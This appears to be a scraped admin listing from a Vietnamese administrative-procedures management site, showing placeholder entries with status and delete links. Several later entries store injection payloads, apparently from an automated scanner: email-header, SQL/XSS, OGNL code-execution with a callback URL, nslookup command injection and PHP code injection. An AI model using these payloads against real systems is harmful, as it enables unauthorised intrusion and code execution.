Quản lý Thủ Tục Hành Chính

Organization
Select Field
Keyword
Ordinal number Procedure Level Implementing agencies
1 1 1 Cấp Quận
2 1 1 Cấp Quận
3 1 1 Cấp Quận
4 1 1 Cấp Quận
5 1 1 Cấp Quận
6 1 1 Cấp Quận
7 1 1 Cấp Quận
8 1 1 Cấp Quận
9 1 1 Cấp Quận
10 1 1 Cấp Quận
11 1 1 Cấp Quận
12 1 1 Cấp Quận
13 1 1 Cấp Quận
14 1 1 Cấp Quận
15 1 1 Cấp Quận
16 1 1 Cấp Quận
17 1 1 Cấp Quận
18 1 1 Cấp Quận
19 1 1 Cấp Quận
20 1 1 Cấp Quận

  Admin thu tuc hanh chinh

Cơ quan thực hiện
Categories
Keyword
# Tên thủ tục Ngày tạo Trạng thái Action
1701 1 8 Months Ago Đã đăng Delete
1702 1 8 Months Ago Đã đăng Delete
1703 1 8 Months Ago Đã đăng Delete
1704 1 8 Months Ago Đã đăng Delete
1705 1 8 Months Ago Đã đăng Delete
1706 1 8 Months Ago Đã đăng Delete
1707 1 8 Months Ago Đã đăng Delete
1708 1 8 Months Ago Đã đăng Delete
1709 1 8 Months Ago Đã đăng Delete
1710 1 8 Months Ago Đã đăng Delete
1711 1 8 Months Ago Đã đăng Delete
1712 1 8 Months Ago Đã đăng Delete
1713 1 8 Months Ago Đã đăng Delete
1714 1 8 Months Ago Đã đăng Delete
1715 1 8 Months Ago Đã đăng Delete
1716 1 8 Months Ago Đã đăng Delete
1717 1 8 Months Ago Đã đăng Delete
1718 1 8 Months Ago Đã đăng Delete
1719 1 8 Months Ago Đã đăng Delete
1720 1 8 Months Ago Đã đăng Delete
1721 1 8 Months Ago Đã đăng Delete
1722 1 8 Months Ago Đã đăng Delete
1723 1 8 Months Ago Đã đăng Delete
1724 1 8 Months Ago Đã đăng Delete
1725 1 8 Months Ago Đã đăng Delete
1726 1 8 Months Ago Đã đăng Delete
1727 1 8 Months Ago Đã đăng Delete
1728 1 8 Months Ago Đã đăng Delete
1729 1 8 Months Ago Đã đăng Delete
1730 1 8 Months Ago Đã đăng Delete
1731 1 8 Months Ago Đã đăng Delete
1732 1 8 Months Ago Đã đăng Delete
1733 1 8 Months Ago Chưa đăng Delete
1734 1 8 Months Ago Đã đăng Delete
1735 1 8 Months Ago Đã đăng Delete
1736 1 8 Months Ago Đã đăng Delete
1737 1 8 Months Ago Đã đăng Delete
1738 1 8 Months Ago Đã đăng Delete
1739 1 8 Months Ago Chưa đăng Delete
1740 1 8 Months Ago Đã đăng Delete
1741 1 8 Months Ago Đã đăng Delete
1742 1 8 Months Ago Đã đăng Delete
1743 1 8 Months Ago Đã đăng Delete
1744 1 8 Months Ago Đã đăng Delete
1745 1 8 Months Ago Chưa đăng Delete
1746 1 8 Months Ago Đã đăng Delete
1747 1 8 Months Ago Đã đăng Delete
1748 1 8 Months Ago Đã đăng Delete
1749 1 8 Months Ago Đã đăng Delete
1750 1 8 Months Ago Đã đăng Delete
1751 1 8 Months Ago Chưa đăng Delete
1752 1 8 Months Ago Đã đăng Delete
1753 1 8 Months Ago Đã đăng Delete
1754 1 8 Months Ago Đã đăng Delete
1755 1 8 Months Ago Đã đăng Delete
1756 1 8 Months Ago Chưa đăng Delete
1757 1 8 Months Ago Đã đăng Delete
1758 1 8 Months Ago Đã đăng Delete
1759 1 8 Months Ago Đã đăng Delete
1760 1 8 Months Ago Đã đăng Delete
1761 1 8 Months Ago Đã đăng Delete
1762 1 8 Months Ago Chưa đăng Delete
1763 1 8 Months Ago Đã đăng Delete
1764 1 8 Months Ago Đã đăng Delete
1765 1 8 Months Ago Đã đăng Delete
1766 1 8 Months Ago Đã đăng Delete
1767 1 8 Months Ago Đã đăng Delete
1768 1 8 Months Ago Chưa đăng Delete
1769 1 8 Months Ago Đã đăng Delete
1770 1 8 Months Ago Đã đăng Delete
1771 1 8 Months Ago Đã đăng Delete
1772 1 8 Months Ago Đã đăng Delete
1773 1 8 Months Ago Đã đăng Delete
1774 1 8 Months Ago Đã đăng Delete
1775 1 8 Months Ago Đã đăng Delete
1776 1 8 Months Ago Đã đăng Delete
1777 1 8 Months Ago Đã đăng Delete
1778 1 8 Months Ago Đã đăng Delete
1779 1 8 Months Ago Đã đăng Delete
1780 1 8 Months Ago Đã đăng Delete
1781 1 8 Months Ago Đã đăng Delete
1782 1 8 Months Ago Đã đăng Delete
1783 1 8 Months Ago Đã đăng Delete
1784 1 8 Months Ago Đã đăng Delete
1785 1 8 Months Ago Đã đăng Delete
1786 1%0abcc:065618.14-84595.14.bbadc.18172.2@bxss.me 8 Months Ago Đã đăng Delete
1787 1'" 8 Months Ago Đã đăng Delete
1788 1'"()&% 8 Months Ago Đã đăng Delete
1789 1'),request,#_memberAccess['allowPrivateAccess']=true,#_memberAccess['allowProtectedAccess']=true,#_memberAccess['allowPackageProtectedAccess']=true,#_memberAccess['allowStaticMethodAccess']=true,#_memberAccess['excludedPackageNamePatterns']=#_memberAccess['acceptProperties'],#_memberAccess['excludedClasses']=#_memberAccess['acceptProperties'],new java.net.URL('http'+'://hit7bl07HHjvR.bxss.me/').openStream().close(),new java.lang.String(' 8 Months Ago Đã đăng Delete
1790 1'>"> 8 Months Ago Đã đăng Delete
1791 19783865 8 Months Ago Đã đăng Delete
1792 1 8 Months Ago Đã đăng Delete
1793 5ujCP8hK 8 Months Ago Đã đăng Delete
1794 ;nslookup hitQlHtuBCX6S5928c.bxss.me|nslookup hitQlHtuBCX6S5928c.bxss.me&nslookup hitQlHtuBCX6S5928c.bxss.me; 8 Months Ago Đã đăng Delete
1795 ;print(md5(31337)); 8 Months Ago Đã đăng Delete
1796